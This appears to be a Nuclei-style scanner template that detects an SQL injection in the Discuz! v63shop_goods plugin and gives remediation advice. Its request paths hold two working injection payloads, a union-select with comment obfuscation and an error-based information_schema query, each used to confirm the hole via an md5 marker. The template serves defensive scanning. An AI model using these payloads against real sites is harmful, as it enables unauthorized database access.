id: Discuz-sqli-v63shop_goods
info:
  name: Discuz v63shop_goods plugin SQL injection vulnerability
  author:
  - 折跃
  description: |-
    Discuz! v63shop_goods plugin SQL injection vulnerability.
    Discuz! is a generic community forum software system.

    The Discuz! v63shop_goods plugin has an SQL injection vulnerability. An attacker can exploit it to execute SQL statements and view, add, modify, or delete information in the database.
  severity: high
  remediation: |-
    Official Fix:
    1. It is recommended that users obtain the latest patch or the latest version from the official site:
    http://discuz.net/

    Temporary Fix:
    1. Use prepared statements. When using PDO, be careful not to concatenate variables directly into PDO statements. All queries should use the parameterized query interface provided by the database; parameterized statements use parameters instead of embedding user-input variables into SQL statements. Virtually all database systems provide a parameterized SQL execution interface, which can very effectively prevent SQL injection attacks.
    2. Escape special characters (such as '"<>&*;) entering the database, or perform encoding conversion.
    3. Validate the type of each piece of data; for example, numeric data must be numeric and the corresponding database field must be of type int.
    4. Strictly enforce data length limits, which to some degree prevents long SQL injection statements from executing correctly.
    5. Use consistent encoding across every data layer of the website; UTF-8 is recommended. Inconsistent encoding between layers may allow some filtering mechanisms to be bypassed.
    6. Strictly limit the database privileges of the website user, granting only the privileges needed to perform their work, thereby minimizing the damage injection attacks can cause to the database.
    7. Avoid displaying SQL error messages, such as type errors or field mismatches, to prevent attackers from using such error information for reconnaissance.
    8. Filter dangerous characters; for example, use regular expressions to match keywords such as union, sleep, and, select, and load_file, and stop execution if matched.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - contains(body,'4beed3b9c4a886067de0e3a094246f78')
  path:
  - '{{BaseURL}}/plugin.php?id=v63shop:goods&pac=info&gid=1 and 1=2 union /*!50000select*/
    1,2,3,4,5,6,md5(3.14),8,9,10,11,12,13,14'
  - '{{BaseURL}}/plugin.php?id=v63shop:goods&pac=info&gid=`''` or @`''''` union select
    1 from (select count(*),concat((select md5(3.14)),floor(rand(0)*2))a from information_schema.tables
    group by a)b where @`''`'
  method: GET
  headers:
    Host: '{{Hostname}}'
  req-condition: true
  stop-at-first-match: true
